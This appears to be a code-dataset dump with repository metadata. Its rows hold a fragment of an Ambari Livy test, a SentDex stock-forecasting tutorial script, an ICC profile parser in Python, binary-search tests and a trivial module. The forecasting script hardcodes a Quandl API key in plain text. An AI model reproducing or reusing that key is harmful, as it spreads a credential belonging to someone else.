self.assertResourceCalled('Directory', '/usr/hdp/current/livy2-server/logs',
owner = 'livy',
group = 'livy',
mode = 0755,
)
self.assertResourceCalled('Execute', '/usr/hdp/current/livy2-server/bin/livy-server start',
environment = {'JAVA_HOME': '/usr/jdk64/jdk1.7.0_45'},
not_if = 'ls /var/run/livy2/livy-livy-server.pid >/dev/null 2>&1 && ps -p `cat /var/run/livy2/livy-livy-server.pid` >/dev/null 2>&1',
user = 'livy'
)
| [] |
harimaruthachalam/SentDexChapters | SentDex/Chapter05.py | b3753ae27b6f965f3611edea9bde2ed5e9478f8f | import quandl
import math
import numpy as np
from sklearn import preprocessing, cross_validation, svm
from sklearn.linear_model import LinearRegression
import pickle
import datetime
from matplotlib import style
import matplotlib.pyplot as plot
# Config
isLoadFromLocal = True
quandl.ApiConfig.api_key = '76eCnz6z9XTH8nfLWeQU'
style.use('ggplot')
# Loading data
if isLoadFromLocal:
df = pickle.load(open("DataFromQuandl_Stock_Chap2.pickle", "rb"))
else:
df = quandl.get('WIKI/GOOGL')
pickle.dump(df, open("DataFromQuandl_Stock_Chap2.pickle", "wb+"))
# Data pre-processing
df['HL_PCT'] = (df['Adj. High'] - df['Adj. Close']) / df['Adj. Close']
df['PCT_Change'] = (df['Adj. Close'] - df['Adj. Open']) / df['Adj. Open']
df = df[['Adj. Close', 'HL_PCT', 'PCT_Change', 'Adj. Volume']]
forecastCol = 'Adj. Close'
df.fillna('-99999', inplace = True)
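# forecast horizon: label each row with the Adj. Close value ~1% of the dataset length into the future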
forecastOut = int(math.ceil(0.01*len(df)))
df['label'] = df[forecastCol].shift(-forecastOut)
# df['label'].plot()
# df[forecastCol].plot()
# plot.legend(loc = 4)
# plot.show()
x = np.array(df.drop(['label'], 1))
print(x)
x = preprocessing.scale(x)
print(x)
xLately = x[-forecastOut:]
x = x[:-forecastOut]
df.dropna(inplace = True)
y = np.array(df['label'])
# Regression
x_train, x_test, y_train, y_test = cross_validation.train_test_split(x, y, test_size=0.1)
# classifier = svm.SVR(kernel='linear') # SVM SVR
classifier = LinearRegression(n_jobs=3) # Linear Regression
classifier.fit(x_train, y_train)
accuracy = classifier.score(x_test, y_test)
forecastSet = classifier.predict(xLately)
print('Accuracy is ', accuracy, '\nForecasted values are ', forecastSet, '\nNumber of values is ', forecastOut)
df['Forecast'] = np.nan
lastDate = df.iloc[-1].name
print(lastDate)
lastTime = lastDate.timestamp()
print(lastTime)
oneDay = 24 * 60 * 60 # seconds in a day
nextTime = lastTime + oneDay
for iter in forecastSet:
nextDate = datetime.datetime.fromtimestamp(nextTime)
nextTime += oneDay
df.loc[nextDate] = [np.nan for _ in range(len(df.columns) - 1)] + [iter]
df['Adj. Close'].plot()
df['Forecast'].plot()
plot.legend(loc = 4)
plot.xlabel('Date')
plot.ylabel('Price')
plot.show() | [((327, 346), 'matplotlib.style.use', 'style.use', (['"""ggplot"""'], {}), "('ggplot')\n", (336, 346), False, 'from matplotlib import style\n'), ((1087, 1109), 'sklearn.preprocessing.scale', 'preprocessing.scale', (['x'], {}), '(x)\n', (1106, 1109), False, 'from sklearn import preprocessing, cross_validation, svm\n'), ((1197, 1218), 'numpy.array', 'np.array', (["df['label']"], {}), "(df['label'])\n", (1205, 1218), True, 'import numpy as np\n'), ((1269, 1323), 'sklearn.cross_validation.train_test_split', 'cross_validation.train_test_split', (['x', 'y'], {'test_size': '(0.1)'}), '(x, y, test_size=0.1)\n', (1302, 1323), False, 'from sklearn import preprocessing, cross_validation, svm\n'), ((1389, 1415), 'sklearn.linear_model.LinearRegression', 'LinearRegression', ([], {'n_jobs': '(3)'}), '(n_jobs=3)\n', (1405, 1415), False, 'from sklearn.linear_model import LinearRegression\n'), ((2085, 2103), 'matplotlib.pyplot.legend', 'plot.legend', ([], {'loc': '(4)'}), '(loc=4)\n', (2096, 2103), True, 'import matplotlib.pyplot as plot\n'), ((2106, 2125), 'matplotlib.pyplot.xlabel', 'plot.xlabel', (['"""Date"""'], {}), "('Date')\n", (2117, 2125), True, 'import matplotlib.pyplot as plot\n'), ((2126, 2146), 'matplotlib.pyplot.ylabel', 'plot.ylabel', (['"""Price"""'], {}), "('Price')\n", (2137, 2146), True, 'import matplotlib.pyplot as plot\n'), ((2147, 2158), 'matplotlib.pyplot.show', 'plot.show', ([], {}), '()\n', (2156, 2158), True, 'import matplotlib.pyplot as plot\n'), ((469, 493), 'quandl.get', 'quandl.get', (['"""WIKI/GOOGL"""'], {}), "('WIKI/GOOGL')\n", (479, 493), False, 'import quandl\n'), ((1896, 1937), 'datetime.datetime.fromtimestamp', 'datetime.datetime.fromtimestamp', (['nextTime'], {}), '(nextTime)\n', (1927, 1937), False, 'import datetime\n')] |
pmay/tifinity | tifinity/actions/icc_parser.py | e004a0e616c7b7455fac6f01ee9acb892cd560c0 | class IccProfile():
"""Parses an ICC Colour Profile.
According to spec: all Profile data shall be encoded as big-endian"""
def __init__(self, bytes):
self.header = {}
self.parse_icc(bytes)
def get_colour_space(self):
"""Returns the data colour space type, or None if not defined"""
return self.header.get('data_colour_space')
def tostring(self, limit_value=False):
out = "\nHEADER\n"
for k, v in self.header.items():
out += " [{0:27}]\t{1:31}\n".format(k, v)
out += "\nTAGS ({0})\n".format(self.tag_count)
for tag, (offset, size, value) in self.tags.items():
if len(value)>100 and limit_value:
out += " [{0}]\t{1}\t{2}\t{3}...\n".format(tag, offset, size, value[:100])
else:
out += " [{0}]\t{1}\t{2}\t{3}\n".format(tag, offset, size, value)
return out
def parse_icc(self, bytes):
"""Parsers the specified bytes representing an ICC Profile"""
# ICC profile consists of:
# - 128-byte profile header
# - profile tag table:
# - profile tagged element data (referenced from tag table)
if bytes is not None:
self.read_header(bytes)
self.read_tags(bytes)
def read_header(self, bytes):
self.header['profile_size'] = IccProfile.read_int(bytes, 0)
self.header['preferred_cmm_type'] = IccProfile.read_string(bytes, 4, 4)
self.header['profile_version_number'] = IccProfile.read_binary_coded_decimal(bytes, 8)
self.header['profile_device_class'] = IccProfile.read_string(bytes, 12, 4)
self.header['data_colour_space'] = IccProfile.read_string(bytes, 16, 4)
self.header['pcs'] = IccProfile.read_string(bytes, 20, 4)
self.header['creation_datetime'] = IccProfile.read_datetime(bytes, 24) # YY-mm-dd HH:mm:ss
self.header['acsp'] = IccProfile.read_string(bytes, 36, 4) # Must = acsp
self.header['primary_platform_sig'] = IccProfile.read_string(bytes, 40, 4) # APPL, MSFT, SGI, SUNW, 0
self.header['profile_flags'] = IccProfile.read_int(bytes, 44) # todo: flags
self.header['device_manufacturer'] = IccProfile.read_string(bytes, 48, 4)
self.header['device_model'] = IccProfile.read_int(bytes, 52)
self.header['device_attributes'] = IccProfile.read_int(bytes, 56) # todo: flags
self.header['rendering_intent'] = IccProfile.read_int(bytes, 64)
self.header['nciexyz_values'] = IccProfile.read_xyznumber(bytes, 68)
self.header['profile_creator_signature'] = IccProfile.read_string(bytes, 80, 4)
self.header['profile_id'] = str(bytes[84:99])
self.header['reserved'] = str(bytes[100:128])
def read_tags(self, bytes):
# 4 bytes tag count
# n x 12 byte tags (4 bytes sig, 4 bytes offset (relative to profile start), 4 bytes size of data element)
self.tag_count = IccProfile.read_int(bytes, 128)
self.tags = {}
for t in range(self.tag_count):
type = IccProfile.read_string(bytes, 132+(t*12), 4)
offset = IccProfile.read_int(bytes, 136+(t*12))
size = IccProfile.read_int(bytes, 140+(t*12))
read_func = tagtypes.get(type)
if read_func is not None:
#read_func = getattr(IccProfile, tag_tuple[0])
value = read_func(bytes, offset, size)
else:
value = bytes[offset: offset+size]
self.tags[type] = (offset, size, value)
@staticmethod
def read_int(bytes, offset, count=1, size=4, byteorder='big'):
return int.from_bytes(bytes[offset:offset+size], byteorder=byteorder)
@staticmethod
def read_string(bytes, offset, count, byteorder='big'):
return ''.join(map(chr, bytes[offset:offset+count]))
@staticmethod
def read_binary_coded_decimal(bytes, start):
out = "{0}.{1}.{2}".format(bytes[start],
bytes[start+1]>>4,
bytes[start+1]&0x0F)
return out
@staticmethod
def read_datetime(bytes, offset, byteorder='big'):
out = "{0}-{1}-{2} {3}:{4}:{5}".format(str(int.from_bytes(bytes[offset:offset + 2], byteorder=byteorder)),
str(int.from_bytes(bytes[offset + 2:offset + 4], byteorder=byteorder)),
str(int.from_bytes(bytes[offset + 4:offset + 6], byteorder=byteorder)),
str(int.from_bytes(bytes[offset + 6:offset + 8], byteorder=byteorder)),
str(int.from_bytes(bytes[offset + 8:offset + 10], byteorder=byteorder)),
str(int.from_bytes(bytes[offset + 10:offset + 12], byteorder=byteorder)))
return out
@staticmethod
def read_signature_type(bytes, offset, count):
assert (IccProfile.read_string(bytes, offset, 4) == 'sig ')
assert (IccProfile.read_int(bytes, offset + 4) == 0)
return IccProfile.read_string(bytes, offset+8, 4)
@staticmethod
def read_xyztype(bytes, offset, count):
sig = IccProfile.read_string(bytes, offset, 4)
assert(IccProfile.read_int(bytes, offset+4) == 0)
# todo: repeat xyz for remainder of xyztype bytes
xyz = IccProfile.read_xyznumber(bytes, offset+8)
return "{0}: {1}".format(sig, xyz)
@staticmethod
def read_xyznumber(bytes, offset, byteorder='big'):
x_i = IccProfile.read_s15Fixed16Number(bytes, offset)
y_i = IccProfile.read_s15Fixed16Number(bytes, offset+4)
z_i = IccProfile.read_s15Fixed16Number(bytes, offset+8)
return "X={0}, Y={1}, Z={2}".format(x_i, y_i, z_i)
@staticmethod
def read_trctype(bytes, offset, count):
# check first 4 bytes, either 'curv' or 'para'
sig = IccProfile.read_string(bytes, offset, 4)
if sig=='curv':
# next 4 bytes 0
assert (IccProfile.read_int(bytes, offset + 4) == 0)
n = IccProfile.read_int(bytes, offset+8)
vals = [IccProfile.read_int(bytes, offset+12+(2*i), size=2) for i in range(n)]
# todo: para
return "{0} : count {1} : {2}".format(sig, n, vals)
@staticmethod
def read_s15Fixed16Number(bytes, offset):
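        # s15Fixed16Number: fixed-point value; the high 16 bits are the integer part and the low 16 bits
        # the fractional part (denominator 65536).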
conv = lambda x: ((x & 0xffff0000) >> 16) + ((x & 0x0000ffff) / 65536)
return conv(int.from_bytes(bytes[offset:offset + 4], byteorder='big'))
@staticmethod
def read_s15Fixed16ArrayType(bytes, offset, count):
assert(IccProfile.read_string(bytes, offset, 4) == 'sf32')
assert(IccProfile.read_int(bytes, offset+4) == 0)
n = int((count-8)/4)
return [IccProfile.read_s15Fixed16Number(bytes, offset+8+(i*4)) for i in range(n)]
tagtypes = {
'chad': (IccProfile.read_s15Fixed16ArrayType),
'cprt': (IccProfile.read_string),
'desc': (IccProfile.read_string),
'dmdd': (IccProfile.read_string),
'tech': (IccProfile.read_signature_type),
'vued': (IccProfile.read_string),
'wtpt': (IccProfile.read_xyztype),
'bkpt': (IccProfile.read_xyztype), # private type?
'rTRC': (IccProfile.read_trctype),
'gTRC': (IccProfile.read_trctype),
'bTRC': (IccProfile.read_trctype),
'rXYZ': (IccProfile.read_xyztype),
'gXYZ': (IccProfile.read_xyztype),
'bXYZ': (IccProfile.read_xyztype),
}
if __name__=='__main__':
import numpy as np
import sys
with open(sys.argv[1], 'rb') as file:
data = np.fromfile(file, dtype="uint8")
profile = IccProfile(data)
print(profile.tostring()) | [((7723, 7755), 'numpy.fromfile', 'np.fromfile', (['file'], {'dtype': '"""uint8"""'}), "(file, dtype='uint8')\n", (7734, 7755), True, 'import numpy as np\n')] |
asakatida/data-structures-and-algorithms.py | challenges/binary_search/test_binary_search.py | 587d1a66a6c15a3c7d7786275608f065687e1810 | from .binary_search import binary_search
def test_binary_search_empty_array():
assert binary_search([], 0) == -1
def test_binary_search_find_single_array():
assert binary_search([3], 3) == 0
def test_binary_search_not_found_single_array():
assert binary_search([1], 0) == -1
def test_binary_search_not_found_in_short_array():
assert binary_search([1, 2, 3], 0) == -1
def test_binary_search_found_at_begining():
assert binary_search([0, 1, 2, 3, 4, 5], 0) == 0
def test_binary_search_found_at_end():
assert binary_search([0, 1, 3, 4, 5], 5) == 4
def test_binary_search_found_at_middle_even():
assert binary_search([0, 1, 3, 5], 3) == 2
def test_binary_search_found_at_middle_odd():
assert binary_search([1, 3, 5], 3) == 1
def test_binary_search_high_value():
assert binary_search([1, 3, 5], 3) == 1
def test_binary_search_large_array_low():
assert binary_search(list(range(0xFFFFFF)), 0xFF) == 0xFF
def test_binary_search_large_array_high():
assert binary_search(list(range(0xFFFFFF)), 0xFFFFF) == 0xFFFFF
def test_binary_search_large_array_not_found():
assert binary_search(list(range(0xFFFFFF)), -4) == -1
| [] |
Cipalex/session3 | Module2.py | fe0866db54d719687f5a89a71ddc17657c91089e | def f():
print('f from module 2')
if __name__ == '__main__':
print('Module 2') | [] |